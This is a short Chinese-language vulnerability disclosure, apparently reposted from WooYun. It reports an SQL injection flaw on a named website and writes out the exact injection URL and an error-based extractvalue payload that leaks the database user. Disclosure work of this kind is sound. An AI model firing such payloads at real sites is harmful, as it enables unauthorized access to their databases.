欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

文集网某站存在SQL注入漏洞

程序员文章站 2022-06-15 23:18:00
文集网某站存在SQL注入漏洞 漏洞影响网站http://test.wenji99.com注入点http://test.wenji99.com/cate_show_ajax.php?ope...

文集网某站存在SQL注入漏洞

漏洞影响网站

http://test.wenji99.com

注入点

http://test.wenji99.com/cate_show_ajax.php?oper=ajax&call=get_cate

POST参数

catid=12313213131313113) and extractvalue(1,concat(0x7e7e7e,user(),0x7e7e7e))%23

WooYun: mallbuilder多用户商城最新版SQL注入(四) 

获取到的数据库当前用户信息:[email protected]

解决方案:

更新系统

上一篇: PHP获取当前相对于域名目录的方法

下一篇: php读取der格式证书乱码解决方法

推荐阅读